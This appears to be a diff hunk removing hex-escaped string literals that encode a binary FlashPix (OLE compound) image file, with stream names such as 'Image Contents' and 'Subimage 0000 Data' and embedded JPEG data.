-"\x00\x00\x00\x00\x99\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00" -"\x05\x00\x49\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x20\x00\x43\x00" -"\x6f\x00\x6e\x00\x74\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x20\x00\x02\x01\x08\x00\x00\x00\x0a\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x15\x00\x00\x00\x68\x0b\x00\x00\x00\x00\x00\x00" -"\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba" -"\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8" -"\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6" -"\xf7\xf8\xf9\xfa\xff\xd9\xc7\x01\x13\x00\x00\x00\x04\x00\x00\x00" -"\x13\x00\x00\x00\xfd\x01\x00\x00\x13\x00\x00\x00\xb6\x01\x00\x00" -"\x04\x00\x00\x00\x85\x42\x21\x3d\x04\x00\x00\x00\x70\x66\x3b\x3d" -"\x13\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\xfd\x01\x00\x00" -"\x13\x00\x00\x00\xb6\x01\x00\x00\x41\x00\x00\x00\x14\x00\x00\x00" -"\x01\x00\xfe\xff\x03\x0a\x00\x00\xff\xff\xff\xff\x00\x60\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x00\x00\x00\x00" -"\x27\x00\x00\x00\x7b\x35\x36\x36\x31\x36\x30\x30\x30\x2d\x43\x31" -"\x35\x34\x2d\x31\x31\x43\x45\x2d\x38\x35\x35\x33\x2d\x30\x30\x41" -"\x41\x30\x30\x41\x31\x46\x39\x35\x42\x7d\x00\x00\x00\x00\x00\xf4" -"\x39\xb2\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6f\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6f\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x5c\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x30\x00\x00\x00" 
-"\x00\x01\x01\x00\x38\x00\x00\x00\x01\x01\x01\x00\x44\x00\x00\x00" -"\x02\x01\x01\x00\x4c\x00\x00\x00\x03\x01\x01\x00\x54\x00\x00\x00" -"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x10\x00\x00\x01\x00\x00\x00" -"\x02\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x13\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x80\x60\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x80\x60\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x88\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" -"\x00\x00\x01\x00\x48\x00\x00\x00\x00\x01\x01\x00\x5c\x00\x00\x00" -"\x01\x01\x01\x00\x64\x00\x00\x00\x02\x01\x01\x00\x6c\x00\x00\x00" -"\x00\x00\x00\x10\x78\x00\x00\x00\x01\x00\x00\x10\x80\x00\x00\x00" -"\x02\x00\x00\x00\xb0\x04\x00\x00\x48\x00\x00\x00\xbc\xec\xba\x23" -"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x12\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x0a\x00\x00\x00\x5f\x00\x00\x00\x00\x00\x00\x00" -"\x05\x00\x54\x00\x72\x00\x61\x00\x6e\x00\x73\x00\x66\x00\x6f\x00" -"\x72\x00\x6d\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00" -"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x24\x00\x02\x01\x17\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x10\x00\x00\x00\xa8\x01\x00\x00\x00\x00\x00\x00" -"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00" 
-"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x33\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x20\x00\x01\x00\x10\x00\x00\x00\x06\x00\x00\x00\x0b\x00\x00\x00" -"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\x40\xba\xad\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" -"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" -"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x2a\x00\x02\x01\x0c\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x17\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6a\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x78\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00" -"\x02\x00\x00\x10\x70\x00\x00\x00\x03\x00\x00\x10\x78\x00\x00\x00" -"\x04\x00\x00\x10\xc0\x00\x00\x00\x05\x00\x00\x10\x08\x01\x00\x00" -"\x00\x00\x01\x00\x10\x01\x00\x00\x01\x00\x01\x00\x24\x01\x00\x00" -"\x00\x01\x01\x00\x38\x01\x00\x00\x01\x01\x01\x00\x44\x01\x00\x00" -"\x02\x01\x01\x00\x50\x01\x00\x00\x01\x00\x00\x10\x58\x01\x00\x00" -"\x00\x00\x00\x10\x70\x01\x00\x00\x02\x00\x00\x00\xb0\x04\x00\x00" -"\x04\x00\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x10\x00\x00\x00" -"\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f" -"\x04\x10\x00\x00\x10\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x80\x3f\x04\x00\x00\x00\x00\x00\x80\x3f" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x64\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x64\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x38\x0b\x00\x00\x20\x00\x00\x00\x01\x00\x00\x00\x08\x01\x00\x00" -"\x01\x00\x04\x03\x10\x01\x00\x00\x02\x00\x00\x03\x4c\x03\x00\x00" -"\x01\x00\x03\x03\x54\x03\x00\x00\x01\x00\x02\x03\x90\x05\x00\x00" -"\x01\x00\x01\x03\xcc\x07\x00\x00\x00\x00\x00\x01\x08\x0a\x00\x00" -"\x02\x00\x00\x01\x10\x0a\x00\x00\x03\x00\x00\x01\x18\x0a\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00" -"\xfd\x01\x00\x00\xb6\x01\x00\x00\x38\x00\x00\x00\x40\x00\x00\x00" -"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" -"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x14\x00\x00\x00\xef\x7a\x00\x00\x00\x00\x00\x00" -"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00" -"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x32\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x0e\x00\x00\x00" -"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\x40\xba\xad\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" -"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" -"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x2a\x00\x02\x01\x0f\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x24\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" -"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x38\x00\x00\x00\x83\x20\x00\x00\x00\x00\x00\x00" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf4\x83\x67\x70\xca\x41\xbc\x7e\x48\x23\x03\x18\xa9\x2d\x6d" -"\xe4\x81\x98\xbd\xc3\xca\x08\x18\xdd\xda\xab\x9d\x50\x95\x05\x6d" -"\x65\x1e\xbb\x86\x31\x5a\x03\x91\x9a\x00\x5a\x28\xa2\x80\x0a\x28" -"\x04\x00\x00\x01\x20\x0a\x00\x00\x05\x00\x00\x01\x28\x0a\x00\x00" -"\x06\x00\x00\x01\x30\x0a\x00\x00\x00\x00\x03\x02\x38\x0a\x00\x00" -"\x01\x00\x03\x02\x40\x0a\x00\x00\x02\x00\x03\x02\x48\x0a\x00\x00" -"\x03\x00\x03\x02\x64\x0a\x00\x00\x04\x00\x03\x02\x70\x0a\x00\x00" 
-"\x00\x00\x02\x02\x78\x0a\x00\x00\x01\x00\x02\x02\x80\x0a\x00\x00" -"\x02\x00\x02\x02\x88\x0a\x00\x00\x03\x00\x02\x02\xa4\x0a\x00\x00" -"\x04\x00\x02\x02\xb0\x0a\x00\x00\x00\x00\x01\x02\xb8\x0a\x00\x00" -"\x01\x00\x01\x02\xc0\x0a\x00\x00\x02\x00\x01\x02\xc8\x0a\x00\x00" -"\x03\x00\x01\x02\xe4\x0a\x00\x00\x04\x00\x01\x02\xf0\x0a\x00\x00" -"\x00\x00\x00\x02\xf8\x0a\x00\x00\x01\x00\x00\x02\x00\x0b\x00\x00" -"\x02\x00\x00\x02\x08\x0b\x00\x00\x03\x00\x00\x02\x24\x0b\x00\x00" -"\x04\x00\x00\x02\x30\x0b\x00\x00\x02\x00\x00\x00\xb0\x04\x00\x00" -"\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c" -"\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13" -"\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a" -"\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48" -"\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff" -"\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32" -"\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b" -"\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01" -"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06" -"\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05" -"\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31" -"\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42" -"\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18" -"\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43" -"\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63" -"\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83" -"\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a" -"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8" -"\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6" 
-"\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2" -"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01" -"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06" -"\xa2\x80\x0a\x28\xa2\x80\x33\x22\xb9\xba\x8d\xbc\xa9\x93\x7b\x01" -"\xd3\xbf\xd7\xde\xad\xc5\x77\x1c\x99\x03\xa8\xea\x3b\x8f\xc2\xa4" -"\x92\x28\xe7\x4c\x38\x0c\x3b\x11\xda\xaa\xcb\x11\x4e\x2e\x10\xcd" -"\x18\xe9\x20\x1f\x3a\xfd\x71\x57\xa3\x23\x58\x97\x03\x2b\x74\x22" -"\x9d\x54\x95\x24\xd8\xb2\x5b\xca\xb7\x11\x9e\x57\x79\xe7\xf0\x6a" -"\x72\xdc\xaa\x90\xb2\x16\x81\x89\x00\x09\x3a\x1f\xa1\xef\x4a\xc3" -"\xe6\xee\x5b\xa2\x99\xb9\x87\xde\x4f\xfb\xe7\x9a\x55\x65\x62\x40" -"\x3c\x8e\xb5\x25\x0e\xa2\x8a\x28\x02\x94\x33\xac\x48\xe4\xab\x1c" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00" -"\xff\x00\x00\x00\xdb\x00\x00\x00\x10\x00\x00\x00\x40\x00\x00\x00" -"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00" -"\xb7\x61\xed\x52\x25\xda\xbb\x85\x11\xc9\x9c\xe0\xe4\x74\xaa\x51" -"\x4e\xdb\xf6\x4a\xbb\x64\x1d\x81\xeb\xf4\xf5\xaa\xd1\xad\xcb\xdd" -"\xb7\xee\x91\x50\x12\x44\x99\xe4\xfd\x69\x72\xbe\xe3\xe6\x5d\x8d" -"\x22\xb7\x11\x5e\x1f\xb3\xc3\x1f\x94\xe7\x2e\x73\x8e\x7b\x9c\x7a" -"\xd5\xc6\x55\x75\x2a\xe0\x32\x9e\x08\x23\x20\xd6\x7c\x6a\xcb\x20" -"\x6d\xc0\x63\xea\x7f\xad\x5f\x46\x0c\x38\x60\x4d\x09\xb7\xb8\x34" -"\x96\xc5\x68\x16\x58\xae\x9e\x24\x84\x2d\xb0\xe4\x1c\xfe\x80\x55" -"\x96\x55\x6c\x6e\x00\xe3\xa7\xb5\x3a\x8a\x62\x1a\x09\x0d\xb7\x69" -"\xc0\xef\x9a\x75\x14\x50\x06\x4c\x60\x5c\x42\x63\x9f\x99\x10\xe1" -"\x88\xe3\x9f\x51\x4d\x2c\xd0\x9c\x4e\x72\xbd\x04\xa3\xb7\xd6\x9f" -"\x28\x31\xdc\x2c\xaa\x09\x0d\xf2\xb8\x1f\xa1\xa9\xc8\x04\x60\x8c" -"\xe7\x8c\x51\x70\xb0\xdc\x90\x33\xf7\x97\xd4\x52\x82\x0f\x20\xf3" -"\xed\x55\x64\x22\xce\x5d\xaa\xea\x17\xbc\x4c\xc0\x11\xf4\xa9\x96" -"\x58\x65\x70\xa9\x22\x97\x3d\x36\x91\x9a\x96\xd5\xf7\x1a\xb9\x3f" 
-"\x98\xfb\x48\xdd\x90\x6a\x14\x49\x62\xcf\x97\x31\x03\xae\x08\xcd" -"\x3c\x06\x04\x86\xe7\x1f\x9d\x2d\x52\x6d\x03\x8a\x62\x2d\xec\xa9" -"\x93\x34\x39\x51\xd5\x93\x9a\xb5\x14\xf1\xca\xe5\x14\x9d\xc0\x02" -"\x41\x1e\xb5\x5a\x83\x31\x80\x19\x31\x9f\x5f\x7a\x77\x4c\x9e\x56" -"\x80\xff\xd9\xdd\x4a\xf6\x27\xde\x93\xb5\xc8\x12\x7b\xef\xb4\xa5" -"\xb4\xad\x12\xcb\x24\x2c\xff\x00\x2a\xe4\x29\xc8\xc0\xf7\xeb\xff" -"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" -"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" -"\x3f\x00\xf4\x6b\xb9\x1d\x25\x3b\x10\x30\xee\x49\xc5\x40\x6e\x1c" -"\x26\xe2\x8a\x31\xd7\xe7\xa9\xee\xe2\xf3\x25\x20\xb1\x03\xd3\x1d" -"\x6a\xb3\xda\x7e\xed\x82\x3f\xcc\x47\x04\x81\x59\xbb\xdc\xd5\x38" -"\xf2\x8e\x82\x76\x99\x89\x00\x6d\x03\xb1\xef\x59\xfa\xa5\xa5\xd4" -"\x97\x2c\xe8\xae\xa0\xe0\xee\x03\x3c\x62\xb4\xf4\xcb\x69\xd7\x7b" -"\x5d\x48\xb2\x31\x3c\xb0\x18\x15\x72\x4f\x9a\x29\x18\xf4\x0a\x40" -"\xfc\xaa\x6b\x61\xe3\x55\x72\xc9\x8a\x15\x9c\x1f\x32\x47\x39\xa6" -"\xd9\xdd\x2d\xc4\x4c\xea\xee\x03\x06\xdc\x46\x30\x2b\x6d\x5d\x5b" -"\x21\x48\x24\x75\xa9\xad\xfe\x5b\x58\x5b\xb6\xc5\x07\xf2\xaa\xb7" -"\x71\xfd\x9a\x6f\x3d\x01\x28\xdf\x78\x0a\x28\xe1\xe3\x45\x38\xc4" -"\x53\xac\xe6\xf9\x98\x4d\x1c\x8e\xca\x52\x53\x1e\x3a\x80\x3a\xd4" -"\xb4\x02\x18\x02\x3a\x1a\x2b\x41\x0f\x9b\xfd\x6b\x53\x54\x16\x60" -"\x07\x53\x4e\x9b\xfd\x6b\x54\x96\xe0\x6d\x66\xef\x4c\x5d\x07\x91" -"\xb5\x44\x6b\xdf\xbd\x12\x80\x2d\xdc\x0e\x00\x53\xfc\xa9\x50\x67" -"\x2e\x47\x27\xdb\xa0\xa2\x40\x5a\x26\x51\xd4\x82\x05\x51\x23\x2d" -"\x40\x36\x71\x03\xc8\x28\x3f\x95\x2e\xd0\xca\xd1\x3f\x34\xb0\x29" -"\x4b\x78\xd1\xba\xaa\x80\x7f\x2a\x57\x07\x21\x97\xa8\xfe\x54\x3d" -"\xc3\xa1\x9c\xa0\xdb\xcb\xe4\x30\xf9\x7f\x84\xd1\x34\xa4\x37\x97" -"\x16\x0c\x87\xf4\xf7\xab\x97\x91\xa4\x88\x37\x8c\xf3\x4d\xb7\x8d" -"\x0c\xa5\xf0\x37\x0a\x5d\x47\xad\x84\x9b\xfd\x6b\x50\xaf\x85\xda" -"\x41\x23\x3e\xb4\xe9\x20\x79\x1f\x76\xe0\x3e\x86\x97\xec\x8b\xfd" 
-"\xf7\xfc\xe9\x0c\x49\x25\xf3\x23\x28\xcb\xc1\x18\x38\x35\x54\x5b" -"\x40\x31\x85\x90\x01\x8c\x01\x21\x18\xab\x7f\x65\x5f\xef\xbf\xe7" -"\x47\xd9\x57\xfb\xef\xf9\xd0\x22\x99\xb4\x84\xc8\xcf\xfb\xd0\x5b" -"\xaf\xef\x0d\x5b\x59\x76\xc6\x10\x29\xc0\x18\xeb\xcd\x2f\xd9\x17" -"\xfb\xef\xf9\xd1\xf6\x45\xfe\xfb\xfe\x74\x00\xd7\x90\xb2\x05\xc1" -"\xfa\x93\x49\x1c\x86\x32\x78\xce\x69\xff\x00\x65\x5f\xef\xbf\xe7" -"\x47\xd9\x57\xfb\xef\xf9\xd0\x32\xc5\x14\x51\x4c\x41\x45\x14\x50" -"\x01\x45\x14\x50\x01\x45\x14\x50\x00\xff\xd9\xc9\x3d\x7f\x9d\x16" -"\xd1\x33\x44\x25\xd2\x6f\x3c\xc8\xc1\xff\x00\x51\x71\xf3\x05\x3e" -"\x99\xea\xb5\xab\x8c\x5e\xa8\xff\xd8\xff\xc0\x00\x11\x08\x00\x40" -"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c" -"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x29\xe3\x96\x4c\x79" -"\x53\x79\x78\xeb\xc6\x73\x4b\x6f\x95\x22\x37\x97\xcc\x70\x79\x38" -"\xc5\x24\xf2\x95\xf9\x63\x1b\x9c\xf1\x8f\x4a\xb3\x6d\x00\x85\x37" -"\xc8\x72\xdd\x49\x34\xac\x36\xcc\x5d\x6e\xca\xf2\x5b\xe6\x78\x03" -"\x05\x38\xf9\x80\xce\x78\xa8\x74\xeb\x1b\xc4\xbb\x89\xa4\x56\x70" -"\x18\x1e\x46\x00\xad\xeb\xac\xcb\xb2\x2e\x86\x43\x80\x3d\x07\x73" -"\x44\x4a\x61\xb8\x92\x14\xe3\xf8\xd0\x1e\x84\x77\x15\xca\xf0\x30" -"\x73\xf6\x97\xd6\xf7\x35\x58\x99\x28\xf2\x5b\x42\x29\x3c\xcf\x98" -"\x2a\xe0\x83\xeb\x50\xbd\xc4\xb1\x00\x64\x44\x50\x7f\xda\xad\x17" -"\x45\x97\x24\x70\xc2\xa8\x5f\x43\x70\xc1\x7e\xce\xeb\x1c\x8a\x7a" -"\xb0\xcd\x74\xf2\xdd\xee\x67\xcd\x65\xb0\xc4\xb9\x76\x50\x76\xc6" -"\x32\x3f\xbf\x52\x48\xc5\xad\x09\x38\xc9\x1c\xe0\xd3\x22\xb4\xdb" -"\x10\x0e\xff\x00\x36\x39\xc0\x14\xb2\xc7\xe5\xdb\xb0\xdc\x48\xc7" -"\x7a\x94\x9a\x65\xc9\xa7\x12\xdd\x9d\xa8\x89\x77\xbf\xcc\xe7\xa9" -"\x3d\x6a\x71\xfb\xc6\xcf\xf0\x8f\xd6\x95\xb2\xe7\x6e\x08\x5e\xfe" -"\xf4\xd9\xf7\xf9\x0c\x21\xfb\xe4\x60\x7b\x56\xa6\x24\x76\xff\x00" -"\xbd\xb8\x92\x73\xf7\x47\xc8\x9f\x41\xd7\xf5\xa2\xf7\xf7\x6a\xb7" -"\x1d\x3c\x93\x96\xff\x00\x77\xbd\x4d\x0c\x62\x28\x96\x35\xe8\xa3" 
-"\x14\xe2\x01\x18\x3c\x8a\x2f\xa8\xad\xa0\xd6\x5c\x9d\xca\x70\x7d" -"\x7d\x69\x08\x12\xae\x18\x61\x87\x5f\x6a\x65\xa4\x6d\x0c\x02\x23" -"\xd1\x0e\xd5\xe7\xf8\x7b\x54\xae\xbb\xb9\x07\x0c\x3a\x1a\x06\x55" -"\x74\x28\x70\x7f\x3a\x86\xe7\xfd\x43\x55\xfc\x6f\x52\x1d\x71\x54" -"\x6e\xd7\x6c\x72\x0f\x4a\x9b\x15\x72\xc0\x9b\x03\x1b\x4f\xe2\x73" -"\x55\x0d\xa5\xb9\x39\xdb\x20\xe3\x1c\x48\x6a\xe7\xd9\x57\xfb\xef" -"\xf9\xd1\xf6\x45\xfe\xfb\xfe\x74\x08\x86\xdc\x25\xbe\x76\x06\x39" -"\x18\xf9\x98\x9a\x92\x49\x44\x8b\xb5\x94\xe3\x39\xe0\xd3\xbe\xca" -"\xbf\xdf\x7f\xce\x8f\xb2\xaf\xf7\xdf\xf3\xa0\x0a\x62\xd2\x01\x9c" 